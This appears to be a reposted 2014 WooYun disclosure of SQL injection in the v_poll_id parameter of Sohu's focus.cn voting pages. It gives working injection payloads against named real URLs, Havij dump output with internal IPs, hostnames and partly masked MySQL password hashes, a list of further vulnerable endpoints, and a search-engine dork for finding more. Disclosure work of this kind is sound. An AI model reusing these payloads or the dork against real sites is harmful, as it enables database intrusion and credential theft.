[公开漏洞]搜狐(第二季)旗下某站通用型sql注入第四集(海量注入点打包)

来源:WooYun 浏览:544次 时间:2014-06-19
做网站找雨过天晴工作室
搜狐(第二季)旗下某站通用型sql注入第四集(海量注入点打包) 相关厂商: 搜狐 漏洞作者:浩天 提交时间:2014-05-05 16:46 公开时间:2014-06-19 16:46 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: php+数字类型注射 php+Mysql 漏洞详情 披露状态:

2014-05-05:细节已通知厂商并且等待厂商处理中
2014-05-05:厂商已经确认,细节仅向厂商公开
2014-05-15:细节向核心白帽子及相关领域专家公开
2014-05-25:细节向普通白帽子公开
2014-06-04:细节向实习白帽子公开
2014-06-19:细节向公众公开

简要描述:

不同的页面程序,都拥有同一个参数,而这个参数却存在注入点,导致不论重要域名还是子域名都存在sql注入的问题
有点累了,都劝我休息一会
都问我用什么辅助设备找到的?我靠的都是双手,一样可以射的很好!!

详细说明:

问题程序主要集中在“投票”页面,注入参数:v_poll_id=

无论重要域名home、house、office等等,还是地区子站,都存在问题

例如:在v_poll_id=4679'后面加个单引号访问,页面报mysqlerror,最下面地址情况是一样的

http://home.focus.cn/group/vote.php?v_poll_id=4679'&group_id=607

3.jpg



然后访问下面的链接,回显数据正常,无报错,说明mysql.user存在

http://home.focus.cn/group/vote.php?v_poll_id=4679' and exists(select * from mysql.user) and '%'='%&group_id=607

4.jpg



但是只能手动穷举暴库,扔到工具里没啥反应,反应异常,但肯定是注入点

漏洞证明:

http://office.focus.cn/group/result.php?v_poll_id=7&group_id=750 用这个尝试吧,扔到havij,office这个读库是成功的,但是也挺慢

Target: http://office.focus.cn/group/result.php?v_poll_id=7&group_id=750

DB Server: MySQL >=5

Resp. Time(avg):152 ms

Current User: fdbuser@192.168.242.102

Sql Version: 5.1.54-log

Current DB: office

System User: fdbuser@192.168.242.102

Host Name: focus-gvm-160-34-tc

System User: fdbuser@10.10.90.54

Compile OS: unknown-linux-gnu

DB User & Pass: root::localhost

root::focus-gvm-160-34-tc

root::127.0.0.1

Installation dir: /usr/local/mysql-5.1.54-linux-x86_64-glibc23/

root:6a3*******35:192.168.242.%

repadm:*8C3E*********E648DDA3:192.168.%

Sql Version: 5.1.54-log

repadm:*8C3ED*********48DDA3:10.%

mysqlmon:*565E9*********B6C0A37F:10.11.160.34

mysqlmon:*565E9********8B6C0A37F:10.11.160.27

repladmin:3bbf*******bb5fe:192.168.242.%

readonly:5d*******6e19d:%

root:6a3*******35:10.10.90.%

repladmin:3bb********b5fe:10.10.90.%

repadm:*8C3E*******E69B712E648DDA3:10.%.%.%

root:6a3bb*****d35:10.11.24.%

fdbuser:54bc******962c10e:10.11.24.%

fdbuser:54bc******c10e:10.10.90.%

fdbuser:54********62c10e:10.10.127.%

fdbuser:54********2c10e:192.168.242.%

fdbuser:54b********0e:localhost

root:6a**********5d35:10.11.160.%

fdbuser:54********2c10e:10.11.160.%

pingmysql:*565E94**********A37F:10.11.36.20

pingmysql:*565E94D8*********36DE148B6C0A37F:192.168.1.178

pingmysql:*565E94**********8B6C0A37F:192.168.1.139

pingmysql:*565E94D80*********148B6C0A37F:10.10.58.195

pingmysql:*565E94D8*********148B6C0A37F:192.168.1.128

pingmysql:*565E94D805********48B6C0A37F:10.11.36.22

Data Bases: information_schema

cdoffice

chanye

cirea

cyxoffice

gzoffice

mysql

mysql_identity

office

office_forum

office_sort

otheroffice_bak

overseashouse

shoffice

shoffice_rent

shop

shop_forum

shop_sort

shopbak

shrentsale_822

shrentsale_913

szoffice

szoffice_rent

szrentsale_822

szrentsale_913

test

tjoffice

下面这个也都是注入点,需要通查“投票”程序v_poll_id参数的处理

http://office.focus.cn/group/vote.php?v_poll_id=7&group_id=750

http://home.focus.cn/group/vote.php?v_poll_id=4679&group_id=607

http://house.focus.cn/group/switch.php?v_poll_id=15386&group_id=3574&m=0&submit=%B2%E9%BF%B4%BD%E1%B9%FB

地区子域名

http://cq.focus.cn/group/result.php?v_poll_id=36&group_id=40000

http://sx.focus.cn/common/group/poll/result.php?v_poll_id=98&group_id=530004

http://bb.focus.cn/common/group/poll/result.php?v_poll_id=4&group_id=2000367

......

数不胜收

搜索引擎,一搜一大堆吖

site:focus.cn inurl:v_poll_id=

修复方案:

准备休息一会

版权声明:转载请注明来源 浩天@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-05 16:54

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无